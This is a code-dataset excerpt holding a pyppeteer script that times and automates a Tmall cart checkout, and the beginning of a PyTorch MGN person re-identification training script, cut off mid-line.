"swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 227, "usage_type": "call"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 239, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 244, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 244, "usage_type": "name"}, {"api_name": "swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 244, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 248, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 248, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 249, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 249, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 251, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 251, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 246, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 246, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 275, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 275, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 277, "usage_type": "call"}, {"api_name": "math.inf", "line_number": 278, "usage_type": "attribute"}, {"api_name": "math.isinf", "line_number": 283, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 284, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 284, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 285, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 276, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 276, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 291, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 297, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 297, 
"usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 297, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 298, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 298, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 298, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 314, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 314, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 314, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 314, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 314, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 343, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 343, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 343, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 291, "usage_type": "name"}, {"api_name": "swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 362, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 363, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 369, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 369, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 369, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 372, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 372, "usage_type": "name"}, {"api_name": "swagger_server.models.node.Node", "line_number": 372, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 375, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 375, "usage_type": "name"}, {"api_name": "swagger_server.models.node.Node", "line_number": 375, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 379, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 379, "usage_type": "name"}, {"api_name": "swagger_server.models.edge.Edge", "line_number": 379, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 387, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 387, "usage_type": "name"}, {"api_name": "swagger_server.models.node.Node", "line_number": 387, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 388, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 388, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 388, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 391, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 391, "usage_type": "name"}, {"api_name": "swagger_server.models.edge.Edge", "line_number": 391, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 392, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 392, "usage_type": "name"}, {"api_name": "swagger_server.models.q_edge.QEdge", "line_number": 392, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 407, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 407, "usage_type": "name"}, {"api_name": "swagger_server.models.edge.Edge", "line_number": 407, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 409, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 409, "usage_type": 
"name"}, {"api_name": "swagger_server.models.edge.Edge", "line_number": 409, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 415, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 415, "usage_type": "name"}, {"api_name": "swagger_server.models.q_edge.QEdge", "line_number": 415, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 417, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 417, "usage_type": "name"}, {"api_name": "swagger_server.models.q_edge.QEdge", "line_number": 417, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 463, "usage_type": "name"}, {"api_name": "swagger_server.models.result.Result", "line_number": 463, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 364, "usage_type": "name"}, {"api_name": "swagger_server.models.result.Result", "line_number": 364, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 476, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 476, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 485, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 485, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 492, "usage_type": "name"}, {"api_name": "swagger_server.models.q_edge.QEdge", "line_number": 492, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 499, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 499, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 499, "usage_type": "name"}, {"api_name": "swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 528, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 528, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 528, "usage_type": "name"}, {"api_name": "swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 539, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 539, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 539, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 550, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 550, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 558, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 558, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 558, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 564, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 564, "usage_type": "name"}, {"api_name": "swagger_server.models.edge.Edge", "line_number": 570, "usage_type": "name"}, {"api_name": "swagger_server.models.q_edge.QEdge", "line_number": 574, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 574, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 574, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 580, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 580, "usage_type": "name"}, {"api_name": "swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 580, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 580, "usage_type": "name"}, {"api_name": 
"typing.Dict", "line_number": 615, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 615, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 615, "usage_type": "name"}, {"api_name": "swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 625, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 626, "usage_type": "name"}, {"api_name": "swagger_server.models.node_binding.NodeBinding", "line_number": 702, "usage_type": "call"}, {"api_name": "swagger_server.models.edge_binding.EdgeBinding", "line_number": 706, "usage_type": "call"}, {"api_name": "swagger_server.models.result.Result", "line_number": 707, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 724, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 725, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 627, "usage_type": "name"}, {"api_name": "swagger_server.models.result.Result", "line_number": 627, "usage_type": "name"}]} +{"seq_id": "98106498", "text": "from pyppeteer import launch\nimport datetime\nimport asyncio\nimport multiprocessing\nimport configparser\nimport tbtime\n\ntbtime = tbtime.tbtime\nconf = configparser.ConfigParser()\n\nwidth, height = 1200, 768\ntime_sc_login = 20 # 二维码扫描时间\nclick_freq = 0.5 # 点击间隔\nrepost_order = 0.3 # 页面加载时间\nBEFORE_SECOND = 0 # 提前2秒开始循环点击\npage_nums = 1\nloop_click_sec = 7 # 持续抢购时间\n\n\nasync def login(page):\n await page.setViewport({\"width\": width, \"height\": height})\n print(' {}秒扫码登录: !!!!'.format(time_sc_login))\n await page.goto('https://login.tmall.com')\n count = time_sc_login\n while count >= 0:\n print('\\r 剩余时间:{}'.format(count), end='')\n count -= 1\n await asyncio.sleep(1)\n\n\nasync def goto_cart_pages(browser) -> list:\n pages = []\n for i in range(page_nums):\n page = await browser.newPage()\n await page.setViewport({\"width\": width, \"height\": height})\n await page.goto('https://cart.tmall.com')\n pages.append(page)\n return pages\n\n\nasync def choose_item(pages):\n page_url = []\n for page in pages:\n page_url.append(page.url)\n for i in range(len(pages)):\n await pages[i].bringToFront()\n while page_url[i] == pages[i].url:\n try:\n # await pages[i].click('[for=J_CheckBox_2750006943813]')\n await pages[i].click('[for={}]'.format(str(conf['tmall']['cart'])))\n break\n except KeyError:\n print('未配置页面标签')\n break\n except:\n await asyncio.sleep(click_freq)\n print('未找到商品标签')\n # logging out not find item\n\n\n# 结算按钮\nasync def settle(pages):\n \"\"\"\n 循环所有页面 点击相应的页面\n 判断页面相应结果是否是对应的要求\n \"\"\"\n page_url = []\n for page in pages:\n page_url.append(page.url)\n for i in range(len(pages)):\n await asyncio.sleep(1)\n await pages[i].bringToFront()\n while page_url[i] == pages[i].url:\n try:\n await pages[i].click('#J_SmallSubmit')\n print('提交结算订单')\n except:\n await asyncio.sleep(click_freq)\n print('未找到结算按钮')\n\n\nasync def push_order(pages):\n page_url = []\n for page in pages:\n page_url.append(page.url)\n idx = 0\n loop_times = int(loop_click_sec / click_freq)\n while True:\n if loop_times < 1:\n break\n idx = (idx + 1) % len(pages)\n await pages[idx].bringToFront()\n if page_url[idx] != pages[idx].url:\n await pages[idx].goto(page_url[idx])\n else:\n await pages[idx].reload()\n try:\n await pages[idx].click('.go-btn')\n print('提交订单')\n except:\n print('未找到提交订单按钮')\n await asyncio.sleep(click_freq)\n\n\nasync def main(buy_time):\n conf_init()\n browser = await launch(\n headless=False,\n 
 args=['--disable-infobars', f'--window-size={width},{height}']\n )\n browser = await browser.createIncognitoBrowserContext()\n page = await browser.newPage()\n await login(page)\n pages = await goto_cart_pages(browser)\n await choose_item(pages)\n await settle(pages)\n\n # wait until it is time to buy\n buy_time = datetime.datetime.strptime(buy_time, '%Y-%m-%d %H:%M:%S')\n now_time = datetime.datetime.strptime(tbtime(), '%Y-%m-%d %H:%M:%S')\n wait_second = (buy_time - now_time).seconds if \\\n (buy_time - datetime.datetime.now()).days >= 0 else 0\n print('Still {} seconds until sale time\n'.format(wait_second))\n if wait_second - BEFORE_SECOND > 0:\n await asyncio.sleep(wait_second - BEFORE_SECOND)\n\n await push_order(pages)\n await asyncio.sleep(3000)\n\n\ndef start(buy_time):\n n_e_l = asyncio.new_event_loop()\n n_e_l.run_until_complete(main(buy_time))\n\n\ndef conf_init():\n conf.read('conf.ini')\n if len(conf['tmall']['cart']) < 10:\n raise Exception('Cart info not configured')\n\n\nif __name__ == '__main__':\n buy_time = input('Enter the sale start time [2020-02-06(space)12:55:50]')\n processes = []\n for i in range(1):\n processes.append(multiprocessing.Process(target=start, args=(buy_time,)))\n processes[i].start()\n", "sub_path": "pyping.py", "file_name": "pyping.py", "file_ext": "py", "file_size_in_byte": 4374, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "tbtime.tbtime", "line_number": 8, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 9, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 56, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 71, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 78, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 102, "usage_type": "call"}, {"api_name": "pyppeteer.launch", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 119, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 119, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 120, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 120, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 122, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 125, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 128, "usage_type": "call"}, {"api_name": "asyncio.new_event_loop", "line_number": 132, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "109324450", "text": "from __future__ import print_function\n\nimport argparse\nimport copy\nimport os\nimport os.path as osp\nimport time\nimport datetime\nimport sys\n\nimport numpy as np\nimport torch\nfrom scipy.spatial.distance import cdist\nfrom sklearn.preprocessing import normalize\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom torchvision.models.resnet import resnet50, Bottleneck\nfrom torchvision.transforms import functional\nimport torch.nn.functional as F\n\nfrom __init__ import cmc, mean_ap\nfrom market1501_erase_ps_label import Market1501, RandomIdSampler\nfrom msmt17_erase_ps_label import MSMT17\nfrom partial_reid import PartialREID\nfrom partial_ilids import PartialiLIDs\nfrom 
easy2hard_triplet import TripletSemihardLoss\nfrom random_erasing_w_ps_label import RandomErasingWithPS\nimport shutil\nfrom pa_pool import pa_max_pool\nfrom ps_head import *\nfrom ps_loss import PSLoss\nfrom np_distance import compute_dist_with_visibility\nfrom file_utils import load_pickle, save_pickle\n\n\nclass MGN(nn.Module):\n def __init__(self, num_classes, args, ps_n_classes):\n super(MGN, self).__init__()\n\n self.args = args\n resnet = resnet50(pretrained=False)\n res_path = os.path.dirname(os.path.realpath(__file__)) + '/resnet50-19c8e357.pth'\n resnet.load_state_dict(torch.load(res_path))\n\n # backbone\n self.backbone = nn.Sequential(\n resnet.conv1,\n resnet.bn1,\n resnet.relu,\n resnet.maxpool,\n resnet.layer1, # res_conv2\n resnet.layer2, # res_conv3\n resnet.layer3[0]# res_conv4_1\n )\n\n # res_conv4x\n res_conv4 = nn.Sequential(*resnet.layer3[1:])\n # res_conv5 global\n res_g_conv5 = resnet.layer4\n # res_conv5 part\n res_p_conv5 = nn.Sequential(\n Bottleneck(1024, 512, downsample=nn.Sequential(nn.Conv2d(1024, 2048, 1, bias=False), nn.BatchNorm2d(2048))),\n Bottleneck(2048, 512),\n Bottleneck(2048, 512))\n res_p_conv5.load_state_dict(resnet.layer4.state_dict())\n\n # mgn part-1 global\n self.p1 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_g_conv5 if args.head_1part_stride == 2 else res_p_conv5))\n # mgn part-2\n self.p2 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))\n # mgn part-3\n self.p3 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))\n\n # global max pooling\n self.maxpool_zg_p1 = nn.MaxPool2d(kernel_size=(12, 4) if args.head_1part_stride == 2 else (24, 8))\n self.maxpool_zg_p2 = nn.MaxPool2d(kernel_size=(24, 8))\n self.maxpool_zg_p3 = nn.MaxPool2d(kernel_size=(24, 8))\n\n # conv1 reduce\n add_part_2048 = nn.Sequential(nn.BatchNorm1d(2048), nn.ReLU())\n self._init_add_part(add_part_2048)\n self.add_part_1 = copy.deepcopy(add_part_2048)\n self.add_part_2 = copy.deepcopy(add_part_2048)\n self.add_part_3 = copy.deepcopy(add_part_2048)\n\n \n reduction = nn.Sequential(nn.Conv2d(2048, 256, 1, bias=False), nn.BatchNorm2d(256), nn.ReLU())\n self._init_reduction(reduction)\n self.reduction_0 = copy.deepcopy(reduction)\n self.reduction_1 = copy.deepcopy(reduction)\n self.reduction_2 = copy.deepcopy(reduction)\n self.reduction_3 = copy.deepcopy(reduction)\n self.reduction_4 = copy.deepcopy(reduction)\n self.reduction_5 = copy.deepcopy(reduction)\n self.reduction_6 = copy.deepcopy(reduction)\n self.reduction_7 = copy.deepcopy(reduction)\n\n # fc softmax loss\n self.fc_id_2048_0_tmp = nn.Linear(2048, 2048)\n self.fc_id_2048_1_tmp = nn.Linear(2048, 2048)\n self.fc_id_2048_2_tmp = nn.Linear(2048, 2048)\n self.fc_id_2048_0 = nn.Linear(2048, num_classes)\n self.fc_id_2048_1 = nn.Linear(2048, num_classes)\n self.fc_id_2048_2 = nn.Linear(2048, num_classes)\n self.fc_id_256_1_0 = nn.Linear(256, num_classes)\n self.fc_id_256_1_1 = nn.Linear(256, num_classes)\n self.fc_id_256_2_0 = nn.Linear(256, num_classes)\n self.fc_id_256_2_1 = nn.Linear(256, num_classes)\n self.fc_id_256_2_2 = nn.Linear(256, num_classes)\n\n self._init_fc(self.fc_id_2048_0_tmp)\n self._init_fc(self.fc_id_2048_1_tmp)\n self._init_fc(self.fc_id_2048_2_tmp)\n self._init_fc(self.fc_id_2048_0)\n self._init_fc(self.fc_id_2048_1)\n self._init_fc(self.fc_id_2048_2)\n self._init_fc(self.fc_id_256_1_0)\n self._init_fc(self.fc_id_256_1_1)\n self._init_fc(self.fc_id_256_2_0)\n self._init_fc(self.fc_id_256_2_1)\n self._init_fc(self.fc_id_256_2_2)\n\n embedding = 
nn.Sequential(nn.Linear(256, 256))\n self.embedding_1 = copy.deepcopy(embedding)\n self.embedding_2 = copy.deepcopy(embedding)\n self.embedding_3 = copy.deepcopy(embedding)\n self._init_embedding(self.embedding_1)\n self._init_embedding(self.embedding_2)\n self._init_embedding(self.embedding_3)\n\n if args.src_ps_lw > 0 or args.cd_ps_lw > 0:\n ps_head_cls = eval(args.ps_head_arch)\n self.ps_head = ps_head_cls({'in_c': 2048, 'mid_c': 256, 'num_classes': ps_n_classes})\n print('Model Structure:')\n print(self)\n \n @staticmethod\n def _init_embedding(embedding):\n nn.init.normal_(embedding[0].weight, std=0.01)\n nn.init.constant_(embedding[0].bias, 0.)\n\n @staticmethod\n def _init_add_part(add_part):\n nn.init.normal_(add_part[0].weight, mean = 1.0, std=0.02)\n nn.init.constant_(add_part[0].bias, 0.)\n \n @staticmethod\n def _init_reduction(reduction):\n nn.init.kaiming_normal_(reduction[0].weight, mode='fan_in')\n nn.init.normal_(reduction[1].weight, mean = 1.0, std=0.02)\n nn.init.constant_(reduction[1].bias, 0.) \n\n @staticmethod\n def _init_fc(fc):\n nn.init.normal_(fc.weight, std=0.001)\n nn.init.constant_(fc.bias, 0.)\n\n def forward(self, in_dict):\n x = self.backbone(in_dict['im'])\n\n p1 = self.p1(x)\n p2 = self.p2(x)\n p3 = self.p3(x)\n\n if hasattr(self, 'ps_head'):\n ps1 = self.ps_head(p1)\n ps2 = self.ps_head(p2)\n ps3 = self.ps_head(p3)\n\n zg_p1 = self.maxpool_zg_p1(p1) # z_g^G\n zg_p2 = self.maxpool_zg_p2(p2) # z_g^P2\n zg_p3 = self.maxpool_zg_p3(p3) # z_g^P3\n\n if args.pap:\n pap_pooled = pa_max_pool({'feat': p2, 'pap_mask': in_dict['pap_mask_2p']})\n z0_p2, z1_p2 = pap_pooled['feat_list']\n part_2_1_v, part_2_2_v = pap_pooled['visible'][:, 0], pap_pooled['visible'][:, 1]\n else:\n zp2 = F.max_pool2d(p2, (12, 8))\n z0_p2 = zp2[:, :, 0:1, :] # z_p0^P2\n z1_p2 = zp2[:, :, 1:2, :] # z_p1^P2\n\n if args.pap:\n pap_pooled = pa_max_pool({'feat': p3, 'pap_mask': in_dict['pap_mask_3p']})\n z0_p3, z1_p3, z2_p3 = pap_pooled['feat_list']\n part_3_1_v, part_3_2_v, part_3_3_v = pap_pooled['visible'][:, 0], pap_pooled['visible'][:, 1], pap_pooled['visible'][:, 2]\n else:\n zp3 = F.max_pool2d(p3, (8, 8))\n z0_p3 = zp3[:, :, 0:1, :] # z_p0^P3\n z1_p3 = zp3[:, :, 1:2, :] # z_p1^P3\n z2_p3 = zp3[:, :, 2:3, :] # z_p2^P3\n \n fg_p1 = self.reduction_0(zg_p1).squeeze(dim=3).squeeze(dim=2) # f_g^G, L_triplet^G\n fg_p2 = self.reduction_1(zg_p2).squeeze(dim=3).squeeze(dim=2) # f_g^P2, L_triplet^P2\n fg_p3 = self.reduction_2(zg_p3).squeeze(dim=3).squeeze(dim=2) # f_g^P3, L_triplet^P3\n f0_p2 = self.reduction_3(z0_p2).squeeze(dim=3).squeeze(dim=2) # f_p0^P2\n f1_p2 = self.reduction_4(z1_p2).squeeze(dim=3).squeeze(dim=2) # f_p1^P2\n f0_p3 = self.reduction_5(z0_p3).squeeze(dim=3).squeeze(dim=2) # f_p0^P3\n f1_p3 = self.reduction_6(z1_p3).squeeze(dim=3).squeeze(dim=2) # f_p1^P3\n f2_p3 = self.reduction_7(z2_p3).squeeze(dim=3).squeeze(dim=2) # f_p2^P3\n \n fg_p1 = self.embedding_1(fg_p1)\n fg_p2 = self.embedding_2(fg_p2)\n fg_p3 = self.embedding_3(fg_p3)\n\n l_p1 = self.fc_id_2048_0_tmp(zg_p1.squeeze(dim=3).squeeze(dim=2)) # L_softmax^G\n l_p2 = self.fc_id_2048_1_tmp(zg_p2.squeeze(dim=3).squeeze(dim=2)) # L_softmax^P2\n l_p3 = self.fc_id_2048_2_tmp(zg_p3.squeeze(dim=3).squeeze(dim=2)) # L_softmax^P3\n \n l_p1 = self.add_part_1(l_p1)\n l_p2 = self.add_part_2(l_p2)\n l_p3 = self.add_part_3(l_p3)\n\n l_p1 = self.fc_id_2048_0(l_p1) # L_softmax^G\n l_p2 = self.fc_id_2048_1(l_p2) # L_softmax^P2\n l_p3 = self.fc_id_2048_2(l_p3) # L_softmax^P3\n\n l0_p2 = self.fc_id_256_1_0(f0_p2) # L_softmax0^P2\n l1_p2 = 
self.fc_id_256_1_1(f1_p2) # L_softmax1^P2\n l0_p3 = self.fc_id_256_2_0(f0_p3) # L_softmax0^P3\n l1_p3 = self.fc_id_256_2_1(f1_p3) # L_softmax1^P3\n l2_p3 = self.fc_id_256_2_2(f2_p3) # L_softmax2^P3\n \n predict_1 = torch.cat([0.8*f0_p2, f1_p2, 0.7*f0_p3, f1_p3, 0.7*f2_p3], dim=1)\n predict_2 = torch.cat([fg_p1, fg_p2, fg_p3, f0_p2, f1_p2, f0_p3, f1_p3, f2_p3], dim=1) #67575\n if hasattr(self, 'ps_head') and args.pap:\n return predict_1, predict_2, fg_p1, fg_p2, fg_p3, l_p1, l_p2, l_p3, l0_p2, l1_p2, l0_p3, l1_p3, l2_p3, part_2_1_v, part_2_2_v, part_3_1_v, part_3_2_v, part_3_3_v, ps1, ps2, ps3\n elif hasattr(self, 'ps_head') and not args.pap:\n return predict_1, predict_2, fg_p1, fg_p2, fg_p3, l_p1, l_p2, l_p3, l0_p2, l1_p2, l0_p3, l1_p3, l2_p3, ps1, ps2, ps3\n elif not hasattr(self, 'ps_head') and args.pap:\n return predict_1, predict_2, fg_p1, fg_p2, fg_p3, l_p1, l_p2, l_p3, l0_p2, l1_p2, l0_p3, l1_p3, l2_p3, part_2_1_v, part_2_2_v, part_3_1_v, part_3_2_v, part_3_3_v\n else:\n return predict_1, predict_2, fg_p1, fg_p2, fg_p3, l_p1, l_p2, l_p3, l0_p2, l1_p2, l0_p3, l1_p3, l2_p3\n\ndef save_model(model, filename):\n state = model.module.state_dict() if hasattr(model, 'module') else model.state_dict()\n for key in state: \n state[key] = state[key].clone().cpu()\n if not os.path.exists(os.path.dirname(filename)):\n os.makedirs(os.path.dirname(filename))\n torch.save(state, filename)\n\ndef load_model_weight(model, model_weight_file):\n assert osp.exists(model_weight_file), \"model_weight_file {} does not exist!\".format(model_weight_file)\n assert osp.isfile(model_weight_file), \"model_weight_file {} is not file!\".format(model_weight_file)\n model_weight = torch.load(model_weight_file, map_location=(lambda storage, loc: storage))\n model.load_state_dict(model_weight)\n msg = '=> Loaded model_weight from {}'.format(model_weight_file)\n print(msg)\n\ndef get_dataset_root(name):\n if name == 'market1501':\n root = 'Market-1501-v15.09.15'\n elif name == 'cuhk03':\n root = 'cuhk03-np-jpg/detected'\n elif name == 'duke':\n root = 'DukeMTMC-reID'\n else:\n raise ValueError\n return root\n\n\nclass InfiniteNextBatch(object):\n def __init__(self, loader):\n self.loader = loader\n self.reset()\n\n def reset(self):\n self.loader_iter = iter(self.loader)\n\n def next_batch(self):\n try:\n batch = self.loader_iter.next()\n except StopIteration:\n self.reset()\n batch = self.loader_iter.next()\n return batch\n\n\ndef get_next_batch(loader):\n try:\n batch = loader.next()\n except StopIteration:\n batch = loader.next()\n return batch\n\n\ndef run(args):\n gpuId, epochs, weight_decay, batch_id, batch_image, lr_1, lr_2, erasing_p, sampling, exp_dir, trainset_name, cd_trainset_name, testset_names, rand_crop, head_1part_stride = \\\n args.gpuId, args.epochs, args.weight_decay, args.batch_id, args.batch_image, args.lr_1, args.lr_2, args.erasing_p, args.sampling, args.exp_dir, args.trainset_name, args.cd_trainset_name, args.testset_names, args.rand_crop, args.head_1part_stride\n\n DEVICE = torch.device(\"cuda:\" + gpuId if torch.cuda.is_available() else \"cpu\")\n print(DEVICE)\n num_workers = 4\n\n batch_test = 64 #32\n\n train_list = [transforms.Resize((400, 144)), transforms.RandomCrop((384, 128))] if rand_crop else [transforms.Resize((384, 128))]\n train_list += [\n transforms.ToTensor(),\n ]\n re_obj = RandomErasingWithPS(probability=erasing_p, mean=[0.0, 0.0, 0.0]) ####\n train_list += [transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])]\n train_transform = 
transforms.Compose(train_list)\n\n if args.ps_head_arch in ['PartSegHeadConv', 'PartSegHeadConvConv']:\n ps_w_h = (8, 24)\n elif args.ps_head_arch in ['PartSegHeadDeconvConv']:\n ps_w_h = (16, 48)\n elif args.ps_head_arch in ['PartSegHeadDeconvDeconvConv']:\n ps_w_h = (32, 96)\n else:\n raise ValueError('Invalid ps_head_arch: {}'.format(args.ps_head_arch))\n\n if args.ps_fuse_type == 'None':\n ps_n_classes = 8\n elif args.ps_fuse_type == '4parts':\n ps_n_classes = 5\n elif args.ps_fuse_type == '2parts':\n ps_n_classes = 3\n elif args.ps_fuse_type == 'fg':\n ps_n_classes = 2\n else:\n raise ValueError('Invalid ps_fuse_type: {}'.format(args.ps_fuse_type))\n\n if trainset_name in ['market1501', 'cuhk03', 'duke']:\n root = get_dataset_root(trainset_name)\n if args.src_ps_lw > 0:\n if trainset_name == 'cuhk03':\n ps_dir = root.replace('cuhk03-np-jpg', 'cuhk03-np-jpg_ps_label')\n else:\n ps_dir = root + '_ps_label'\n if args.ps_label_root != 'None':\n ps_dir = args.ps_label_root\n else:\n ps_dir = None\n train_dataset = Market1501(\n root + '/bounding_box_train',\n transform=train_transform,\n training=True,\n kpt_file=trainset_name+'-kpt.pkl' if args.pap else None,\n ps_dir=ps_dir,\n re_obj=re_obj,\n ps_w_h=ps_w_h,\n ps_fuse_type=args.ps_fuse_type,\n )\n elif trainset_name in ['msmt17']:\n ps_dir = 'msmt17/MSMT17_V1_ps_label'\n if args.ps_label_root != 'None':\n ps_dir = args.ps_label_root\n train_dataset = MSMT17(\n transform=train_transform,\n training=True,\n use_kpt=args.pap,\n ps_dir=ps_dir,\n split='train',\n re_obj=re_obj,\n ps_w_h=ps_w_h,\n ps_fuse_type=args.ps_fuse_type,\n )\n else:\n raise ValueError('Invalid train set {}'.format(trainset_name))\n train_loader = DataLoader(train_dataset,\n sampler=RandomIdSampler(train_dataset, batch_image=batch_image),\n batch_size=batch_id * batch_image,\n num_workers=num_workers, drop_last=True)\n \n # TODO: consider erase ps label\n # TODO: ps_dir, and args.ps_label_root for cd_train\n if args.cd_ps_lw > 0:\n if cd_trainset_name in ['market1501', 'cuhk03', 'duke']:\n cd_train_dataset = Market1501(get_dataset_root(cd_trainset_name) + '/bounding_box_train', transform=train_transform, training=True, kpt_file=None, ps_dir=cd_trainset_name + '-ps')\n elif cd_trainset_name in ['msmt17']:\n cd_train_dataset = MSMT17(transform=train_transform, training=True, use_kpt=False, use_ps=True)\n else:\n raise ValueError('Invalid cd train set {}'.format(cd_trainset_name))\n cd_train_loader = 